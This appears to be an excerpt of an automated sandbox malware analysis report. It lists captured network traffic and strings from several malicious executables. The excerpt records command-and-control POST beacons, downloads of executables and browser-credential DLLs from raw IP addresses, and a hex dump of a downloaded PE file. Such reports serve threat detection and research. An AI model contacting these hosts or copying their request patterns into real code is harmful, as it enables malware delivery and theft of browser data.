00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 11 Aug 2022 04:54:09 GMTContent-Type: application/octet-streamContent-Length: 1099223Connection: keep-aliveLast-Modified: Mon, 11 Apr 2022 12:28:56 GMTETag: "62541f08-10c5d7"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 22 a9 2c 62 00 76 0e 00 b2 13 00 00 e0 00 06 21 0b 01 02 19 00 0c 0b 00 00 fa 0c 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 20 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 10 0f 00 00 06 00 00 c8 9d 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 b0 0c 00 6e 2a 00 00 00 e0 0c 00 d0 0c 00 00 00 10 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 0d 00 e0 3b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c e2 0c 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 ac 0a 0b 00 00 10 00 00 00 0c 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 20 0b 00 00 28 00 00 00 12 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 10 44 01 00 00 50 0b 00 00 46 01 00 00 3a 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 a0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 6e 2a 00 00 00 b0 0c 00 00 2c 00 00 00 80 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 e0 0c 00 00 0e 00 00 00 ac 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 f0 0c 00 00 02 00 00 00 ba 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 00 0d 00 00 02 00 00 00 bc 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 10 0d 00 00 06 00 00 00 be 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 e0 3b 00 00 00 20 0d 00 00 3c 00 00 00 c4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 60 0d 00 00 06 00 00 00 00 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 70 0d 00 00 ca 00 00 00 06 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 40 0e 00 00 28 00 00 00 d0 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a 2d 00 00
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ynbbrbceap.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 302Host: linislominyt11.at
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://oywaxqplv.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 292Host: linislominyt11.at
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://grmajt.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 359Host: linislominyt11.at
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ujdgu.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 208Host: linislominyt11.at
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://xysctbcs.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 309Host: linislominyt11.at
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://hghdetsybj.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 247Host: linislominyt11.at
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://niskfgcbn.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 291Host: linislominyt11.at
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://vuhmrda.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 258Host: linislominyt11.at
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://kmthapyqsb.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 311Host: linislominyt11.at
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://tqgrrc.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 152Host: linislominyt11.at
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ppejyk.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 355Host: linislominyt11.at
                    Source: global trafficHTTP traffic detected: GET /f/1.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 85.192.63.46
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://kekatmodj.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 210Host: linislominyt11.at
                    Source: global trafficHTTP traffic detected: GET /newfile.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 62.204.41.178
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://rgvwxic.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 304Host: linislominyt11.at
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://kxdfdo.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 134Host: linislominyt11.at
                    Source: Joe Sandbox ViewASN Name: ITLDC-NLUA ITLDC-NLUA
                    Source: Joe Sandbox ViewIP Address: 211.59.14.90 211.59.14.90
                    Source: E69F.exe, 00000023.00000002.575819836.0000000000563000.00000004.00000020.00020000.00000000.sdmp, E69F.exe, 00000023.00000003.479561462.0000000000559000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.56.146.177/
                    Source: E69F.exe, 00000023.00000003.478816889.000000000054A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.56.146.177/M
                    Source: E69F.exe, 00000023.00000003.479074188.0000000000572000.00000004.00000020.00020000.00000000.sdmp, E69F.exe, 00000023.00000002.575225680.0000000000554000.00000004.00000020.00020000.00000000.sdmp, E69F.exe, 00000023.00000002.578384942.0000000000575000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.56.146.177/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/freebl3.dll
                    Source: E69F.exe, 00000023.00000002.575225680.0000000000554000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.56.146.177/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/freebl3.dll.dll
                    Source: E69F.exe, 00000023.00000003.479074188.0000000000572000.00000004.00000020.00020000.00000000.sdmp, E69F.exe, 00000023.00000002.575225680.0000000000554000.00000004.00000020.00020000.00000000.sdmp, E69F.exe, 00000023.00000002.578384942.0000000000575000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.56.146.177/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/mozglue.dll
                    Source: E69F.exe, 00000023.00000002.575225680.0000000000554000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.56.146.177/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/mozglue.dll.dll
                    Source: E69F.exe, 00000023.00000003.479074188.0000000000572000.00000004.00000020.00020000.00000000.sdmp, E69F.exe, 00000023.00000002.575225680.0000000000554000.00000004.00000020.00020000.00000000.sdmp, E69F.exe, 00000023.00000002.578384942.0000000000575000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.56.146.177/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/msvcp140.dll
                    Source: E69F.exe, 00000023.00000002.575225680.0000000000554000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.56.146.177/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/msvcp140.dll4
                    Source: E69F.exe, 00000023.00000002.573881772.0000000000547000.00000004.00000020.00020000.00000000.sdmp, E69F.exe, 00000023.00000003.479074188.0000000000572000.00000004.00000020.00020000.00000000.sdmp, E69F.exe, 00000023.00000002.575750847.0000000000558000.00000004.00000020.00020000.00000000.sdmp, E69F.exe, 00000023.00000002.578384942.0000000000575000.00000004.00000020.00020000.00000000.sdmp, E69F.exe, 00000023.00000002.575819836.0000000000563000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.56.146.177/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/nss3.dll
                    Source: E69F.exe, 00000023.00000002.575750847.0000000000558000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.56.146.177/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/nss3.dllI
                    Source: E69F.exe, 00000023.00000002.575750847.0000000000558000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.56.146.177/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/nss3.dllY
                    Source: E69F.exe, 00000023.00000002.575225680.0000000000554000.00000004.00000020.00020000.00000000.sdmp, E69F.exe, 00000023.00000002.578384942.0000000000575000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.56.146.177/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/softokn3.dll
                    Source: E69F.exe, 00000023.00000003.479074188.0000000000572000.00000004.00000020.00020000.00000000.sdmp, E69F.exe, 00000023.00000002.575225680.0000000000554000.00000004.00000020.00020000.00000000.sdmp, E69F.exe, 00000023.00000002.578384942.0000000000575000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.56.146.177/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/sqlite3.dll
                    Source: E69F.exe, 00000023.00000003.479074188.0000000000572000.00000004.00000020.00020000.00000000.sdmp, E69F.exe, 00000023.00000002.575225680.0000000000554000.00000004.00000020.00020000.00000000.sdmp, E69F.exe, 00000023.00000002.578384942.0000000000575000.00000004.00000020.00020000.00000000.sdmp, E69F.exe, 00000023.00000002.575819836.0000000000563000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.56.146.177/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/vcruntime140.dll
                    Source: E69F.exe, 00000023.00000002.575819836.0000000000563000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.56.146.177/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/vcruntime140.dll1
                    Source: E69F.exe, 00000023.00000002.575225680.0000000000554000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.56.146.177/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/vcruntime140.dllJ
                    Source: E69F.exe, 00000023.00000002.575819836.0000000000563000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.56.146.177/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/vcruntime140.dll_
                    Source: E69F.exe, 00000023.00000002.576521462.000000000056B000.00000004.00000020.00020000.00000000.sdmp, E69F.exe, 00000023.00000002.578384942.0000000000575000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.56.146.177/e2f032260ba0b2ece29cbd952d3f7f02
                    Source: E69F.exe, 00000023.00000002.576521462.000000000056B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.56.146.177/e2f032260ba0b2ece29cbd952d3f7f02&
                    Source: E69F.exe, 00000023.00000002.576521462.000000000056B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.56.146.177/e2f032260ba0b2ece29cbd952d3f7f02.
                    Source: E69F.exe, 00000023.00000002.578384942.0000000000575000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.56.146.177/e2f032260ba0b2ece29cbd952d3f7f02PowerShell
                    Source: 28E9.exe, 00000014.00000002.419440478.0000000000571000.00000004.00000020.00020000.00000000.sdmp, 28E9.exe, 00000014.00000003.397866108.000000000052C000.00000004.00000020.00020000.00000000.sdmp, 28E9.exe, 00000014.00000002.419058353.000000000052C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.138.74.104/8d5bc04a8dfb506a455ebe83e0e99bb1
                    Source: 28E9.exe, 00000014.00000002.419440478.0000000000571000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.138.74.104/8d5bc04a8dfb506a455ebe83e0e99bb1$D
                    Source: 28E9.exe, 00000014.00000002.419440478.0000000000571000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.138.74.104/8d5bc04a8dfb506a455ebe83e0e99bb1wD
                    Source: 28E9.exe, 00000014.00000002.419440478.0000000000571000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.138.74.104/8d5bc04a8dfb506a455ebe83e0e99bb1xD
                    Source: softokn3.dll.20.dr, nss3.dll.20.dr, mozglue.dll.20.dr, freebl3.dll.20.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
                    Source: 33.exe.4.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                    Source: softokn3.dll.20.dr, nss3.dll.20.dr, mozglue.dll.20.dr, freebl3.dll.20.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
                    Source: softokn3.dll.20.dr, nss3.dll.20.dr, mozglue.dll.20.dr, freebl3.dll.20.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
                    Source: 33.exe.4.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
                    Source: 33.exe.4.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                    Source: 33.exe.4.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                    Source: A658.exe, 0000001C.00000003.459744323.00000000008AE000.00000004.00000020.00020000.00000000.sdmp, A658.exe, 0000001C.00000002.497283250.00000000008A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                    Source: 33.exe.4.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                    Source: softokn3.dll.20.dr, nss3.dll.20.dr, mozglue.dll.20.dr, freebl3.dll.20.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
                    Source: softokn3.dll.20.dr, nss3.dll.20.dr, mozglue.dll.20.dr, freebl3.dll.20.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
                    Source: 33.exe.4.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
                    Source: 33.exe.4.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                    Source: 33.exe.4.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                    Source: softokn3.dll.20.dr, nss3.dll.20.dr, mozglue.dll.20.dr, freebl3.dll.20.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
                    Source: softokn3.dll.20.dr, nss3.dll.20.dr, mozglue.dll.20.dr, freebl3.dll.20.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
                    Source: softokn3.dll.20.dr, nss3.dll.20.dr, mozglue.dll.20.dr, freebl3.dll.20.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
                    Source: 33.exe.4.drString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0=
                    Source: softokn3.dll.20.dr, nss3.dll.20.dr, mozglue.dll.20.dr, freebl3.dll.20.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
                    Source: softokn3.dll.20.dr, nss3.dll.20.dr, mozglue.dll.20.dr, freebl3.dll.20.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
                    Source: A658.exe, 0000001B.00000002.458620558.0000000002340000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://https://ns1.kriston.ugns2.chalekin.ugns3.unalelath.ugns4.andromath.ug/Error
                    Source: 33.exe.4.drString found in binary or memory: http://ocsp.digicert.com0
                    Source: 33.exe.4.drString found in binary or memory: http://ocsp.digicert.com0A
                    Source: 33.exe.4.dr, softokn3.dll.20.dr, nss3.dll.20.dr, mozglue.dll.20.dr, freebl3.dll.20.drString found in binary or memory: http://ocsp.digicert.com0C
                    Source: softokn3.dll.20.dr, nss3.dll.20.dr, mozglue.dll.20.dr, freebl3.dll.20.drString found in binary or memory: http://ocsp.digicert.com0N
                    Source: softokn3.dll.20.dr, nss3.dll.20.dr, mozglue.dll.20.dr, freebl3.dll.20.drString found in binary or memory: http://ocsp.digicert.com0O
                    Source: 33.exe.4.drString found in binary or memory: http://ocsp.digicert.com0X
                    Source: 33.exe.4.dr, softokn3.dll.20.dr, nss3.dll.20.dr, mozglue.dll.20.dr, freebl3.dll.20.drString found in binary or memory: http://www.digicert.com/CPS0
                    Source: mozglue.dll.20.drString found in binary or memory: http://www.mozilla.com/en-US/blocklist/
                    Source: A658.exe, 0000001B.00000002.458620558.0000000002340000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.openssl.org/support/faq.html
                    Source: 33.exe.4.drString found in binary or memory: http://www.opera.com0
                    Source: sqlite3.dll.20.drString found in binary or memory: http://www.sqlite.org/copyright.html.
                    Source: 28E9.exe, 00000014.00000003.397412783.000000000053F000.00000004.00000020.00020000.00000000.sdmp, 8EK4CZ3qdU65.20.dr, y79VUKJAS8XH.20.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                    Source: A658.exe, 0000001C.00000003.460852249.000000000087C000.00000004.00000020.00020000.00000000.sdmp, A658.exe, 0000001C.00000002.495884561.0000000000837000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/
                    Source: A658.exe, 0000001C.00000003.460852249.000000000087C000.00000004.00000020.00020000.00000000.sdmp, A658.exe, 0000001C.00000002.495884561.0000000000837000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/-J
                    Source: A658.exe, A658.exe, 0000001B.00000002.458620558.0000000002340000.00000040.00001000.00020000.00000000.sdmp, A658.exe, 0000001C.00000003.460852249.000000000087C000.00000004.00000020.00020000.00000000.sdmp, A658.exe, 0000001C.00000003.459744323.00000000008AE000.00000004.00000020.00020000.00000000.sdmp, A658.exe, 0000001C.00000002.495884561.0000000000837000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/geo.json
                    Source: A658.exe, 0000001C.00000002.495884561.0000000000837000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/geo.jsonn
                    Source: 28E9.exe, 00000014.00000003.397412783.000000000053F000.00000004.00000020.00020000.00000000.sdmp, 8EK4CZ3qdU65.20.dr, y79VUKJAS8XH.20.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                    Source: 28E9.exe, 00000014.00000003.397412783.000000000053F000.00000004.00000020.00020000.00000000.sdmp, 8EK4CZ3qdU65.20.dr, y79VUKJAS8XH.20.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                    Source: 28E9.exe, 00000014.00000003.397412783.000000000053F000.00000004.00000020.00020000.00000000.sdmp, 8EK4CZ3qdU65.20.dr, y79VUKJAS8XH.20.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                    Source: 28E9.exe, 00000014.00000003.397412783.000000000053F000.00000004.00000020.00020000.00000000.sdmp, 8EK4CZ3qdU65.20.dr, y79VUKJAS8XH.20.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                    Source: softokn3.dll.20.dr, nss3.dll.20.dr, mozglue.dll.20.dr, freebl3.dll.20.drString found in binary or memory: https://mozilla.org0
                    Source: 28E9.exe, 00000014.00000003.397412783.000000000053F000.00000004.00000020.00020000.00000000.sdmp, 8EK4CZ3qdU65.20.dr, y79VUKJAS8XH.20.drString found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
                    Source: 28E9.exe, 00000014.00000003.397412783.000000000053F000.00000004.00000020.00020000.00000000.sdmp, 8EK4CZ3qdU65.20.dr, y79VUKJAS8XH.20.drString found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                    Source: 28E9.exe, 00000014.00000003.393400015.000000000052C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
                    Source: softokn3.dll.20.dr, nss3.dll.20.dr, mozglue.dll.20.dr, freebl3.dll.20.drString found in binary or memory: https://www.digicert.com/CPS0
                    Source: 28E9.exe, 00000014.00000003.397412783.000000000053F000.00000004.00000020.00020000.00000000.sdmp, 8EK4CZ3qdU65.20.dr, y79VUKJAS8XH.20.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                    Source: unknownDNS traffic detected: queries for: monsutiur4.com
                    Source: C:\Users\user\AppData\Local\Temp\28E9.exeCode function: 20_2_00407EDB LocalAlloc,LocalAlloc,StrStrW,lstrlenW,LocalAlloc,LocalAlloc,LocalFree,WideCharToMultiByte,LocalAlloc,LocalAlloc,LocalAlloc,LocalAlloc,WideCharToMultiByte,LocalFree,LocalFree,LocalFree,LocalFree,lstrlen,lstrcpyn,LocalFree,LocalFree,GetFileSize,LocalAlloc,lstrlen,lstrcpyn,ReadFile,ReadFile,CloseHandle,LocalFree,DeleteFileW,LocalFree,LocalFree,LocalAlloc,lstrlen,lstrcpyn,lstrcpyn,lstrlen,LocalFree,InternetOpenW,InternetSetOptionW,InternetSetOptionW,InternetConnectW,HttpOpenRequestW,HttpOpenRequestW,lstrlenW,HttpSendRequestW,HttpSendRequestW,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,lstrlen,MultiByteToWideChar,MultiByteToWideChar,LocalAlloc,lstrlen,MultiByteToWideChar,MultiByteToWideChar,LocalFree,LocalFree,LocalFree,LocalFree,
                    Source: global trafficHTTP traffic detected: GET /aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/nss3.dll HTTP/1.1Content-Type: text/plain;User-Agent: qwrqrwrqwrqwrHost: 45.138.74.104Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/msvcp140.dll HTTP/1.1Content-Type: text/plain;User-Agent: qwrqrwrqwrqwrHost: 45.138.74.104Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/vcruntime140.dll HTTP/1.1Content-Type: text/plain;User-Agent: qwrqrwrqwrqwrHost: 45.138.74.104Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/mozglue.dll HTTP/1.1Content-Type: text/plain;User-Agent: qwrqrwrqwrqwrHost: 45.138.74.104Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/freebl3.dll HTTP/1.1Content-Type: text/plain;User-Agent: qwrqrwrqwrqwrHost: 45.138.74.104Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/softokn3.dll HTTP/1.1Content-Type: text/plain;User-Agent: qwrqrwrqwrqwrHost: 45.138.74.104Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/sqlite3.dll HTTP/1.1Content-Type: text/plain;User-Agent: qwrqrwrqwrqwrHost: 45.138.74.104Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /f/1.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 85.192.63.46
                    Source: global trafficHTTP traffic detected: GET /newfile.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 62.204.41.178
                    Source: global trafficHTTP traffic detected: GET /aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/nss3.dll HTTP/1.1Content-Type: text/plain;User-Agent: qwrqrwrqwrqwrHost: 193.56.146.177Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/msvcp140.dll HTTP/1.1Content-Type: text/plain;User-Agent: qwrqrwrqwrqwrHost: 193.56.146.177Connection: Keep-AliveCache-Control: no-cache
